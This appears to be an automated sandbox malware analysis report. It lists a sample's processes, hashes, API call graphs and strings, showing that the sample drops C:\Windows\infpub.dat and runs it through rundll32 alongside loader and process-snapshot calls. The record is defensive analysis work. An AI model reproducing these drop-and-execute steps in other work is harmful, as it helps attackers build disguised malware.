                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:44
                                            Start time:02:18:56
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\svchost.exe
                                            Wow64 process (32bit):false
                                            Commandline:C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
                                            Imagebase:0x7ff7b4ee0000
                                            File size:55'320 bytes
                                            MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                            Has elevated privileges:true
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:48
                                            Start time:02:18:57
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\cdd.dll
                                            Wow64 process (32bit):
                                            Commandline:
                                            Imagebase:
                                            File size:267'264 bytes
                                            MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                            Has elevated privileges:
                                            Has administrator privileges:
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:49
                                            Start time:02:18:57
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\fontdrvhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:"fontdrvhost.exe"
                                            Imagebase:0x7ff6080a0000
                                            File size:827'408 bytes
                                            MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:50
                                            Start time:02:18:57
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\LogonUI.exe
                                            Wow64 process (32bit):false
                                            Commandline:"LogonUI.exe" /flags:0x2 /state0:0xa3f8d855 /state1:0x41c64e6d
                                            Imagebase:0x7ff778710000
                                            File size:13'824 bytes
                                            MD5 hash:893144FE49AA16124B5BD3034E79BBC6
                                            Has elevated privileges:true
                                            Has administrator privileges:true
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            General

                                            Target ID:55
                                            Start time:02:18:59
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\cdd.dll
                                            Wow64 process (32bit):
                                            Commandline:
                                            Imagebase:
                                            File size:267'264 bytes
                                            MD5 hash:9B684213A399B4E286982BDAD6CF3D07
                                            Has elevated privileges:
                                            Has administrator privileges:
                                            Programmed in:C, C++ or other language
                                            Has exited:false

                                            General

                                            Target ID:56
                                            Start time:02:18:59
                                            Start date:25/07/2024
                                            Path:C:\Windows\System32\fontdrvhost.exe
                                            Wow64 process (32bit):false
                                            Commandline:"fontdrvhost.exe"
                                            Imagebase:0x7ff6080a0000
                                            File size:827'408 bytes
                                            MD5 hash:BBCB897697B3442657C7D6E3EDDBD25F
                                            Has elevated privileges:false
                                            Has administrator privileges:false
                                            Programmed in:C, C++ or other language
                                            Has exited:true

                                            Disassembly

                                            Reset < >

                                              Execution Graph

                                              Execution Coverage:3.2%
                                              Dynamic/Decrypted Code Coverage:0%
                                              Signature Coverage:30.9%
                                              Total number of Nodes:81
                                              Total number of Limit Nodes:10
                                              execution_graph 2376 5112c0 2396 511660 2376->2396 2379 511487 2424 511499 2379->2424 2380 5112eb GetCommandLineW CommandLineToArgvW 2380->2379 2382 51130f 2380->2382 2384 511339 wcsstr 2382->2384 2385 511318 GetSystemDirectoryW 2382->2385 2383 511495 2384->2385 2385->2379 2387 5113a9 lstrcatW 2385->2387 2387->2379 2388 5113c3 2387->2388 2398 5110c0 GetModuleHandleW GetModuleFileNameW 2388->2398 2390 5113d5 2390->2379 2419 511260 CreateFileW 2390->2419 2393 5113f9 wsprintfW 2394 511430 2393->2394 2394->2394 2395 511449 CreateProcessW ExitProcess 2394->2395 2397 5112cd GetCommandLineW 2396->2397 2397->2379 2397->2380 2399 51110d 2398->2399 2400 51123e 2398->2400 2428 511000 CreateFileW 2399->2428 2402 511499 4 API calls 2400->2402 2404 51124b 2402->2404 2403 511126 2403->2400 2405 51112e GetProcessHeap HeapAlloc 2403->2405 2404->2390 2407 511225 2405->2407 2408 511189 memcpy 2405->2408 2409 511499 4 API calls 2407->2409 2410 5111aa GetProcessHeap RtlAllocateHeap 2408->2410 2411 51119e 2408->2411 2412 511238 2409->2412 2413 5111d0 2410->2413 2414 5111e5 GetProcessHeap HeapFree 2410->2414 2411->2410 2412->2390 2437 511690 2413->2437 2417 511499 4 API calls 2414->2417 2418 51121f 2417->2418 2418->2390 2420 511284 WriteFile 2419->2420 2421 5112aa 2419->2421 2422 5112a3 FindCloseChangeNotification 2420->2422 2423 511299 2420->2423 2421->2379 2421->2393 2422->2421 2423->2422 2425 5114a1 2424->2425 2426 5114a4 SetUnhandledExceptionFilter UnhandledExcep GetCurrentProcess TerminateProcess 2424->2426 2425->2383 2426->2383 2429 5110b5 2428->2429 2430 51102b GetFileSize 2428->2430 2429->2403 2431 5110a3 FindCloseChangeNotification 2430->2431 2432 511039 GetProcessHeap HeapAlloc 2430->2432 2431->2403 2433 511050 ReadFile 2432->2433 2434 511091 2432->2434 2433->2434 2435 51106a 2433->2435 2434->2431 2435->2434 2436 51106f GetProcessHeap HeapFree CloseHandle 2435->2436 2436->2403 2438 5116c9 2437->2438 2440 5116d9 2438->2440 2441 51173c 2438->2441 2440->2414 2442 511750 2441->2442 2446 511dd0 2441->2446 2443 512a4f 2442->2443 2445 511b8f memcpy 2442->2445 2442->2446 2443->2446 2447 512dcb 2443->2447 2445->2442 2446->2440 2448 512de1 2447->2448 2449 512e21 memcpy 2448->2449 2450 512e39 memcpy 2448->2450 2451 512dfa 2448->2451 2449->2451 2450->2451 2452 512e58 memcpy 2450->2452 2451->2446 2452->2451 2453 513393 malloc 2454 5128d5 2455 5128df 2454->2455 2456 512dcb 3 API calls 2455->2456 2457 511dd2 2455->2457 2456->2457 2476 511be4 2480 5117be 2476->2480 2477 512a4f 2478 512dcb 3 API calls 2477->2478 2479 511dd0 2477->2479 2478->2479 2480->2477 2480->2479 2481 511b8f memcpy 2480->2481 2481->2480 2482 5133a6 ??3@YAXPAX 2458 511f3b 2460 511f4f 2458->2460 2459 512012 2462 512dcb 3 API calls 2459->2462 2463 511dd2 2459->2463 2460->2459 2461 511fe4 memcpy 2460->2461 2461->2459 2462->2463

                                              Callgraph

                                              Executed Functions

                                              Function 005110C0 Relevance: 13.6, APIs: 9, Instructions: 133memoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetModuleHandleW.KERNEL32(00000000,?,0000030C,?), ref: 005110F8
                                              • GetModuleFileNameW.KERNEL32(00000000), ref: 005110FF
                                                • Part of subcall function 00511000: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0051101A
                                                • Part of subcall function 00511000: GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0051102D
                                                • Part of subcall function 00511000: GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0051103D
                                                • Part of subcall function 00511000: HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00511044
                                                • Part of subcall function 00511000: ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00511060
                                                • Part of subcall function 00511000: GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00511071
                                                • Part of subcall function 00511000: HeapFree.KERNEL32(00000000,?,?), ref: 00511078
                                                • Part of subcall function 00511000: CloseHandle.KERNEL32(00000000,?), ref: 00511080
                                              • GetProcessHeap.KERNEL32(00000000,?,?,00000000,?,?), ref: 00511172
                                              • HeapAlloc.KERNEL32(00000000,?,00000000,?,?), ref: 00511179
                                              • memcpy.MSVCRT ref: 00511192
                                              • GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,?), ref: 005111BB
                                              • RtlAllocateHeap.NTDLL(00000000), ref: 005111BE
                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00511207
                                              • HeapFree.KERNEL32(00000000), ref: 0051120A
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: Heap$Process$File$AllocFreeHandleModule$AllocateCloseCreateNameReadSizememcpy
                                              • String ID:
                                              • API String ID: 796136525-0
                                              • Opcode ID: 0271b003138481404f5a76131a2654fc2a725b6ff6b52acd045feb4cc2578a78
                                              • Instruction ID: 7d73f123d279d9b3726962f4ea2d14e7cb98a57e86c2eaa9a2fa023b9941620a
                                              • Opcode Fuzzy Hash: 0271b003138481404f5a76131a2654fc2a725b6ff6b52acd045feb4cc2578a78
                                              • Instruction Fuzzy Hash: 7A418471A016199BEB20DF65DC44AEABBB9FF9C700F0041D9EA059B241DB31DD94CFA4
                                              Function 005112C0 Relevance: 22.9, APIs: 9, Strings: 4, Instructions: 138processstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetCommandLineW.KERNEL32 ref: 005112DF
                                              • GetCommandLineW.KERNEL32 ref: 005112FC
                                              • CommandLineToArgvW.SHELL32(00000000), ref: 005112FF
                                              • wcsstr.MSVCRT ref: 0051133D
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 0051139B
                                              • lstrcatW.KERNEL32(?,\rundll32.exe), ref: 005113B5
                                              • wsprintfW.USER32 ref: 00511418
                                              • CreateProcessW.KERNELBASE ref: 00511479
                                              • ExitProcess.KERNEL32 ref: 00511481
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: CommandLine$Process$ArgvCreateDirectoryExitSystemlstrcatwcsstrwsprintf
                                              • String ID: %ws C:\Windows\%ws,#1 %ws$D$\rundll32.exe$infpub.dat
                                              • API String ID: 39178828-1758013632
                                              • Opcode ID: be11fead9b998ef4514394135854fb5e76307b2ce9c5eac93fa78f71fae20222
                                              • Instruction ID: 2dd89dca1deae3204f41e4f600e058218ac9945c5dee02a861dd6d88e763c4e0
                                              • Opcode Fuzzy Hash: be11fead9b998ef4514394135854fb5e76307b2ce9c5eac93fa78f71fae20222
                                              • Instruction Fuzzy Hash: C841D3719006189BEB24DB94CC55BEA7778FF54740F0445D9EA06C7140EB709EA8CF64
                                              Function 00511000 Relevance: 13.6, APIs: 9, Instructions: 79memoryfileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?), ref: 0051101A
                                              • GetFileSize.KERNEL32(00000000,00000000,?,?,?), ref: 0051102D
                                              • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,?,?), ref: 0051103D
                                              • HeapAlloc.KERNEL32(00000000,?,?,?), ref: 00511044
                                              • ReadFile.KERNELBASE(00000000,00000000,00000000,?,00000000,?,?), ref: 00511060
                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?), ref: 00511071
                                              • HeapFree.KERNEL32(00000000,?,?), ref: 00511078
                                              • CloseHandle.KERNEL32(00000000,?), ref: 00511080
                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?), ref: 005110A4
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: Heap$File$CloseProcess$AllocChangeCreateFindFreeHandleNotificationReadSize
                                              • String ID:
                                              • API String ID: 861328920-0
                                              • Opcode ID: a738f7529a707449a33e5f9b30c143a1a15d57e1f68b0e9933f43a575a4e298f
                                              • Instruction ID: 827b3820c4f1be6ac2f5bb5e74f4e660ab22fb9261a44913b6ed183d0234a881
                                              • Opcode Fuzzy Hash: a738f7529a707449a33e5f9b30c143a1a15d57e1f68b0e9933f43a575a4e298f
                                              • Instruction Fuzzy Hash: 1E218172A01214ABD7309BA6AC4CFDBBF6CFB5D762F104195FA0996240D7318984DBA0
                                              Function 00511260 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 70 511260-511282 CreateFileW 71 511284-511297 WriteFile 70->71 72 5112aa-5112af 70->72 73 5112a3-5112a4 FindCloseChangeNotification 71->73 74 511299-51129c 71->74 73->72 74->73 75 51129e 74->75 75->73
                                              APIs
                                              • CreateFileW.KERNELBASE(C:\Windows\infpub.dat,40000000,00000000,00000000,00000002,00000000,00000000,00000000,?,?,005113F0,?,?,?), ref: 00511277
                                              • WriteFile.KERNELBASE(00000000,?,?,?,00000000,?,005113F0,?,?,?), ref: 0051128F
                                              • FindCloseChangeNotification.KERNELBASE(00000000,?,005113F0,?,?,?), ref: 005112A4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: File$ChangeCloseCreateFindNotificationWrite
                                              • String ID: C:\Windows\infpub.dat
                                              • API String ID: 3805958096-2284094909
                                              • Opcode ID: d243838fcfe21efb444f4149697c9ad5d23d7994b506872abbf4ebf23e89e2d0
                                              • Instruction ID: 94a02c18a022f045638a55f67b7eae70731b13a700afb1e3ca0909734d59b487
                                              • Opcode Fuzzy Hash: d243838fcfe21efb444f4149697c9ad5d23d7994b506872abbf4ebf23e89e2d0
                                              • Instruction Fuzzy Hash: 59F08276A011147BE7205B57EC4CFD73E2CEBC67A1F008129FB14C6180D6705D85C6B4

                                              Non-executed Functions

                                              Function 0051201D Relevance: 10.8, Strings: 8, Instructions: 826COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: invalid bit length repeat$invalid code lengths set$invalid distance code$invalid distance too far back$invalid literal/length code$too many length or distance symbols$|JQ$|JQ
                                              • API String ID: 0-3650201126
                                              • Opcode ID: 605b86085bb452d894c98525bb1c14ad5b4685413c2dd6951e5337057797049f
                                              • Instruction ID: 006a56f6baebb27ecbb287d1e49a3d0f6073e6a460ea18376eb4f7681eae9204
                                              • Opcode Fuzzy Hash: 605b86085bb452d894c98525bb1c14ad5b4685413c2dd6951e5337057797049f
                                              • Instruction Fuzzy Hash: AE624771E006159BDF18CF59C8906EDBBF2FF88300F1485AAD856AB386D7749A90CF90
                                              Function 00513840 Relevance: 8.1, Strings: 6, Instructions: 578COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 386 513840-5138d6 387 5138d8-5138f8 386->387 388 5138fa-513900 386->388 389 513912 387->389 388->389 390 513902-513910 388->390 391 513916-51391d 389->391 390->388 392 513923 391->392 393 513bac-513bc9 391->393 394 513990-513993 392->394 395 513925-513939 392->395 396 513bcc-513bd2 393->396 401 5139a2-5139ab 394->401 402 513995-5139a0 394->402 397 51393b-513945 395->397 398 51397f 395->398 399 513bd4-513be3 396->399 400 513be6-513bef 396->400 397->398 404 513947-51394d 397->404 406 513989-51398d 398->406 399->400 405 513bf2-513bfc 400->405 403 5139ae-5139b6 401->403 402->401 407 5139d1-5139da 403->407 408 5139b8-5139bb 403->408 404->398 409 51394f-513955 404->409 410 513c17-513c1e 405->410 411 513bfe-513c01 405->411 406->391 415 5139e0-5139e3 407->415 416 513ad4-513ad6 407->416 414 5139bc-5139c0 408->414 409->398 417 513957-513967 409->417 412 513d04-513d06 410->412 413 513c24-513c27 410->413 418 513c02-513c06 411->418 425 513dea-513dec 412->425 429 513d0c-513d21 412->429 419 513c29-513c3b 413->419 420 513c3d-513c43 413->420 421 5139c6-5139ca 414->421 422 513e28-513e2f 414->422 423 5139e5-5139e7 415->423 424 513a0a-513a11 415->424 416->425 426 513adc-513aef 416->426 417->398 427 513969-51396f 417->427 418->422 428 513c0c-513c10 418->428 419->420 430 513c45-513c54 420->430 431 513c57-513c64 420->431 421->394 432 5139cc 421->432 433 513e31 422->433 434 513e33-513e56 422->434 435 5139e9-5139f8 423->435 436 5139fa-513a08 423->436 439 513a20-513a2a 424->439 440 513a13-513a1e 424->440 441 513dfa-513e04 425->441 442 513dee-513df8 425->442 426->403 437 513971 427->437 438 513973-51397d 427->438 428->396 443 513c12 428->443 429->405 430->431 446 513c67-513c76 431->446 432->422 433->434 447 513e58-513e68 434->447 448 513e6c-513e7d 434->448 435->436 436->424 437->398 438->406 444 513a2d-513a3c 439->444 440->439 445 513e16-513e1c 441->445 442->445 443->422 455 513a42-513a45 444->455 456 513af4-513af6 444->456 449 513e21-513e26 445->449 450 513e1e 445->450 451 513d28-513d2a 446->451 452 513c7c-513c7f 446->452 447->448 453 513e87-513e92 448->453 454 513e7f-513e85 448->454 449->422 450->449 457 513d30-513d49 451->457 458 513dde-513de8 451->458 461 513c81-513c93 452->461 462 513cd8-513cdb 452->462 464 513e94-513e9c 453->464 465 513e9e-513ea5 453->465 454->453 459 513a47-513a49 455->459 460 513aac-513aaf 455->460 456->458 463 513afc-513b0f 456->463 457->446 458->445 466 513a4b-513a5a 459->466 467 513a5c-513a6c 459->467 468 513ab1-513ab5 460->468 469 513a6e-513a7a 460->469 470 513c95-513ca1 461->470 462->470 471 513cdd-513ce1 462->471 463->444 472 513ea8-513eae 464->472 465->472 466->467 467->469 468->469 475 513ab7-513acf 468->475 473 513a80-513aa7 469->473 474 513b14-513b22 469->474 476 513d50-513d5e 470->476 477 513ca7-513cd0 470->477 471->470 478 513ce3-513cfd 471->478 479 513eb0-513ebb 472->479 480 513ebd-513ec7 472->480 473->414 483 513e06-513e14 474->483 484 513b28-513b2f 474->484 475->414 482 513d64-513d6b 476->482 476->483 477->418 478->418 481 513eca-513ed2 479->481 480->481 485 513d8d-513d93 482->485 486 513d6d-513d73 482->486 483->445 487 513b31-513b3b 484->487 488 513b55-513b5b 484->488 493 513d95-513da1 485->493 494 513dbd-513dc3 485->494 491 513d75-513d7d 486->491 492 513dcd-513dd9 486->492 495 513b9d-513ba5 487->495 496 513b3d-513b45 487->496 489 513b89-513b93 488->489 490 513b5d-513b6d 488->490 489->495 498 513b95-513b9b 489->498 490->495 497 513b6f-513b7d 490->497 491->492 492->418 493->492 499 513da3-513db1 493->499 494->492 500 513dc5-513dcb 494->500 495->414 496->495 497->495 501 513b7f-513b87 497->501 498->495 499->492 502 513db3-513dbb 499->502 500->492 501->495 502->492
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Genu$ineI$invalid distance code$invalid distance too far back$invalid literal/length code$ntel
                                              • API String ID: 0-3089872807
                                              • Opcode ID: d7d2ae05a5d14cd36e8454229cd7d9b64a7fc8f78057d7ded9784fda44eabb42
                                              • Instruction ID: 417438e5c2bbfa2225c6af805b08de076177b0eb41157c486568199290f659c9
                                              • Opcode Fuzzy Hash: d7d2ae05a5d14cd36e8454229cd7d9b64a7fc8f78057d7ded9784fda44eabb42
                                              • Instruction Fuzzy Hash: CC121932A083458FEB15DE38C5A469ABFE1BF84354F148A2CE895D7B41D371DE88DB81
                                              Function 0051173C Relevance: 6.7, APIs: 1, Strings: 3, Instructions: 675COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: header crc mismatch$unknown compression method$xIQ
                                              • API String ID: 0-3124641399
                                              • Opcode ID: 3f9c9e7498959f82cdda4dd080c3c3424cd163566438bfcc3f96182cfe9a505c
                                              • Instruction ID: cd69c0390eb06c99d94688dcb1338f81ef95f15aa76b89fdd20bf825efba78c9
                                              • Opcode Fuzzy Hash: 3f9c9e7498959f82cdda4dd080c3c3424cd163566438bfcc3f96182cfe9a505c
                                              • Instruction Fuzzy Hash: 7E425AB0A04605DFEF18CF59C484AAEBFF2BF88300F1485A9D9159B256D770DE90CB84
                                              Function 00511499 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00511566
                                              • UnhandledExcep.KERNEL32(00514080), ref: 00511571
                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 0051157C
                                              • TerminateProcess.KERNEL32(00000000), ref: 00511583
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID: ProcessUnhandled$CurrentExcepExceptionFilterTerminate
                                              • String ID:
                                              • API String ID: 1999905405-0
                                              • Opcode ID: 77ba04372209fee5f471bdcb39df6d51f95c32738a3eaeec80ffcb817a6559fc
                                              • Instruction ID: 02c79e317f77f28d0288c6f2865bbf999a1180f90767d3c88fd1750ffea82694
                                              • Opcode Fuzzy Hash: 77ba04372209fee5f471bdcb39df6d51f95c32738a3eaeec80ffcb817a6559fc
                                              • Instruction Fuzzy Hash: 4C21C7BA981204EBC360DF65FD886E43BB5BB3C354B10D019E90887320EB70598EEF59
                                              Function 005130E3 Relevance: .2, Instructions: 200COMMON
                                              Download Yara Rule
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.1253081484.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                              • Associated: 00000000.00000002.1253064080.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253103847.0000000000514000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.1253127728.0000000000519000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_510000_LisectAVT_2403002C_35.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7dc9f76d2ba4baf9a5b0ac0849eeea171e6263f4def31c7d3fbd81d3a968c81b
                                              • Instruction ID: b8c067a438b6c583a8e933823d9233770dc3a7992be42a287f629e8e83a73398
                                              • Opcode Fuzzy Hash: 7dc9f76d2ba4baf9a5b0ac0849eeea171e6263f4def31c7d3fbd81d3a968c81b
                                              • Instruction Fuzzy Hash: 287182317209419BDB18CF1EECD05A673A2F7ED34074AC538DA1687391C635EA2BDAD0

                                              Execution Graph

                                              Execution Coverage:22.2%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:26.6%
                                              Total number of Nodes:1415
                                              Total number of Limit Nodes:30
                                              execution_graph 6478 4bfb03b 6480 4bfb04f 6478->6480 6479 4bfb112 6481 4bfbecb 3 API calls 6479->6481 6483 4bfaed2 6479->6483 6480->6479 6482 4bfb0e4 memcpy 6480->6482 6481->6483 6482->6479 6484 4bf67f9 StrCmpIW 6485 4bf6825 6484->6485 6486 4bf6815 StrCmpW 6484->6486 6486->6485 6487 4bf7938 6488 4bf7941 DisableThreadLibraryCalls 6487->6488 6489 4bf7950 6487->6489 6488->6489 6490 4bf7bf7 GetSystemDirectoryW 6491 4bf7c1c lstrcatW 6490->6491 6492 4bf7cc0 6490->6492 6491->6492 6493 4bf7c36 GetModuleFileNameW 6491->6493 6493->6492 6494 4bf7c4d PathFindFileNameW wsprintfW 6493->6494 6495 4bf7c7c 6494->6495 6495->6495 6496 4bf7c90 CreateProcessW ExitProcess 6495->6496 6522 4bfb9d5 6523 4bfb9df 6522->6523 6524 4bfbecb 3 API calls 6523->6524 6525 4bfaed2 6523->6525 6524->6525 4850 4bf9154 FreeLibrary 4851 4bf923a 4850->4851 4852 4bf9176 CreateFileW 4850->4852 4853 4bf920d DeleteFileW 4852->4853 4854 4bf91a1 GetFileSize FindCloseChangeNotification CreateFileW 4852->4854 4862 4bf9016 4853->4862 4854->4853 4855 4bf91ca GetProcessHeap RtlAllocateHeap 4854->4855 4857 4bf91e5 WriteFile GetProcessHeap HeapFree 4855->4857 4858 4bf9204 CloseHandle 4855->4858 4857->4858 4858->4853 4860 4bf9233 ExitProcess 4863 4bf903a VirtualProtect 4862->4863 4864 4bf9146 4862->4864 4863->4864 4869 4bf909e 4863->4869 4864->4860 4871 4bf79d7 4864->4871 4866 4bf9129 VirtualProtect 4866->4864 4867 4bf9123 4867->4864 4867->4866 4868 4bf90b0 LoadLibraryA 4868->4869 4869->4866 4869->4867 4869->4868 4870 4bf90fa GetProcAddress 4869->4870 4870->4869 4929 4bf7897 4871->4929 4874 4bf79fc 4956 4bf7f04 GetComputerNameW 4874->4956 4878 4bf7a05 ExitProcess 4879 4bf7a1b 4974 4bf84ee CreateToolhelp32Snapshot 4879->4974 4880 4bf7a0d 4880->4879 4962 4bf7e8e 4880->4962 4888 4bf6c5f 13 API calls 4889 4bf7a70 InitializeCriticalSection 4888->4889 5004 4bf652f 4889->5004 4896 4bf7b99 4900 4bf7bde Sleep 4896->4900 5067 4bf554a CryptAcquireContextW 4896->5067 4897 4bf7ad5 CreateThread 4898 4bf7aea 4897->4898 4899 4bf7af8 4897->4899 6267 4bf77d1 4897->6267 4898->4899 5034 4bf7146 4898->5034 5060 4bf6cc8 4899->5060 5077 4bf8a23 4900->5077 4906 4bf7b03 4908 4bf7b0c 4906->4908 4909 4bf7b63 4906->4909 4913 4bf6c5f 13 API calls 4908->4913 4912 4bf6cc8 3 API calls 4909->4912 4916 4bf7b6e CreateThread 4912->4916 4917 4bf7b1e 4913->4917 5063 4bfa420 GetProcessHeap HeapAlloc 4916->5063 6250 4bfa1a9 4916->6250 5085 4bf85fb 4917->5085 4927 4bf7b2f 4927->4909 5104 4bfa3b1 CreateThread 4927->5104 5112 4bf796e CreateThread 4927->5112 5119 4bf6e66 4927->5119 4930 4bf78a8 GetTickCount srand GetTickCount 4929->4930 4931 